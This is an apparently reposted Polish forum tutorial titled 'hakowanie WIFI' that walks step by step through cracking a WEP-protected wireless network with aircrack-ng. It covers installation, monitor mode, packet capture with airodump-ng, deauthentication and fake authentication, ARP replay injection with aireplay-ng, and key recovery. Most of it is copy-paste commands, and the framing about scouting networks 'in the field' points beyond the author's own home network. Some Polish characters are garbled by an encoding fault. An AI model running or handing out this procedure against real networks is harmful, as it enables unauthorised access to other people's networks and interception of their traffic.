hakowanie WIFI.doc

(50 KB) Pobierz
Je¶li już działa nam karta, to zabieramy się do akcji

Je¶li już działa nam karta, to zabieramy się do akcji! (w razie problemów pisać poniżej Wink)

¦ci±gamy program aircrack-ng: Wersja 1.0 RC1


Rozpakowujemy, kompilujemy i instalujemy. Jak to zrobić?


Najlepiej by było, je¶li powyższe archiwum, umie¶ciliby¶cie nie na pulpicie, ale w Folderze Domowym. Będzie po prostu wygodniej.

Rozpakowujemy...

Otwieramy konsolę i wpisujemy:

Kod:

 

tar -zxvf aircrack-ng-1.0-rc1.tar.gz
Pliki rozpakuj± się do katalogu aircrack-ng-1.0-rc1

Kompilujemy...

Kod:

cd aircrack-ng-1.0-rc1


Za pomoc± powyższego polecenia, przechodzimy do folderu z aircrackiem.

Kod:

make


Teraz kompiluj± się komponenty aircrack.


Instalujemy...

Musimy to zrobić z konta superużytkownika. Jak to robimy?

Najpierw wpisujemy

Kod:

su


...a potem

Kod:

make install



B±dĽ od razu wpisać...

Kod:

sudo make install





Ok... Mamy zainstalowane, to teraz przechodzimy do sedna...


Wszystkie polecenia wykonujemy z uprawnieniami superużytkownika!!


Odpalamy kartę w trybie monitora. Nasz interfejs powinien nosić nazwę ath0.

Kod:

airmon-ng start ath0

Je¶li to nie zadziała to wpisujemy "wifi0", b±dĽ "wlan0".
W przypadku, gdyby¶cie nie mogli znaleĽć interfejsu, to wpiszcie

Kod:

iwconfig


...a to polecenie automatycznie wyszuka interfejsy, które obsługuj± sieci bezprzewodowe.

Robimy rozpoznanie w plenerze i wyszukujemy sieci, któr± chcemy testować i t±, któr± możemy testować.
Zatem...

Kod:

airodump-ng -c 2 -w test ath0


Ale co to znaczy?

airodump-ng - nazwa programu, którego chcemy użyć
-c - okre¶la kanał, na którym znajduje się sieć
-w - okre¶la plik, w jakim będ± zachowywane przechwycone pakiety
ath0 - nazwa intersejsu

Je¶li w otoczeniu jest parę sieci na tym samym kanale, to musimy bardziej sprecyzować opcję przechwytywania, dodaj±c opcję

Kod:

--bssid


...a po nim adres MAC sieci.

Załóżmy, że BSSID (adres MAC sieci), to 00:0F:D8:98:CF:0A (wymy¶lony przeze mnie), czyli nasze polecenie, z t± rozszerzon± opcj± wygl±dałoby tak:

Kod:

airodump-ng -c 2  --bssid 00:0F:D8:98:CF:0A  -w test ath0


Może wydawać się nieco skomplikowane, ale je¶li kto¶ umie my¶leć, to zrozumie Wink

Czyli najpro¶ciej mówi±c... Polecenie to przechwytuje dane z kanału drugiego, z AP o adresie 00:0F:D8:98:CF:0A do pliku test, wykorzystuj±c przy tym interfejs ath0.



Otwieramy kolejne 3 konsole, a powyższe polecenie niech nadal działa.
Te polecenia najlepiej wpisywać szybko, jedno po drugim w osobnych konsolach.
Polecam najpierw wypisanie sobie poleceń w edytorze tekstu, a potem wklejać po kolei te polecenia do konsol.

 


Dla mojej wygody pisania, a dla Waszej wygody czytania od razu ustalę adresy MAC poszczególnych urz±dzeń.

BSSID (adres MAC Acess Point'a) - 00:0F:D8:98:CF:0A
adres MAC naszej karty - 00:11:22:33:44:55
adres MAC komputera podł±czonego do zabezpieczonej sieci - 00:1A:2B:3C:4D:5E

Opcji dodatkowych poleceń nie będę opisywać, będziecie się orientować po adresach MAC, jaka opcja do czego służy.


Najlepiej wpisywać w kolejno¶ci, w jakiej jest podane niżej, a raczej jest to nawet wskazane Wink

Kod:

aireplay-ng -0 0 -a 00:0F:D8:98:CF:0A -c 00:1A:2B:3C:4D:5E -h 00:11:22:33:44:55 ath0


Umożliwia wykonanie dwóch poniższych poleceń WinkWypuszcza pakiety, które co¶ tam deindentyfikuj±, ale to polecenie jest prawie, że niezbędne.

Kod:

aireplay-ng -1 0 -a 00:0F:D8:98:CF:0A -h 00:11:22:33:44:55 ath0


Powyższe polecenie to fałszywa identyfikacja z AP. Efekt możecie obejrzeć w uruchomionym airodump-ng. Możemy zobaczyć siebie jako podł±czonych do routera, ale za nim rzeczywi¶cie się do niego podł±czymy, to musimy wykonać poniższe polecenie, które jest najbardziej czasochłonne.

Kod:

aireplay-ng -3 -b 00:0F:D8:98:CF:0A -h 00:11:22:33:44:55 ath0


To polecenie wpuszcza pakiety. Je¶li wszystko pójdzie dobrze, to do¶ć szybko powinno nabijać się ARP. Podejrzyjcie sobie konsolę z airodump-ng. Jako #Data powinno być co najmniej 40000 pakietów, więc musicie poczekać zanim pakiety zostan± wstrzyknięte Wink


Gdy już mamy wystarczaj±c± ilo¶ć pakietów, to otwieramy kolejn± konsolę i wpisujemy:

Kod:

aircrack-ng test-01.cap




Airodump-ng urozmaica nam trochę nazwę pliku. Z wybranego przez nas "test" modyfikuje go do "test-01.cap"
Zawsze możecie obejrzeć jaka jest nazwa pliku w Folderze domowym.

Klucz do sieci powinien się wyliczyć w dosłownie kilka sekund!


Testowałem to w mojej domowej sieci z zabezpieczeniem WEP 64 bit, a potem z WEP 128 bit. Nie sprawdzałem WEP 256bit i WEP 512bit. Też powinno dać się złamać, tylko że będzie potrzebna większa ilo¶ć pakietów.
W razie jakichkolwiek problemów proszę pisać pod spodem.


Dziękuję za uwagę i przepraszam, że się tak rozpisałem, ale wszystko jest, mam nadzieję, porz±dnie wytłumaczone.

 

...
Zgłoś jeśli naruszono regulamin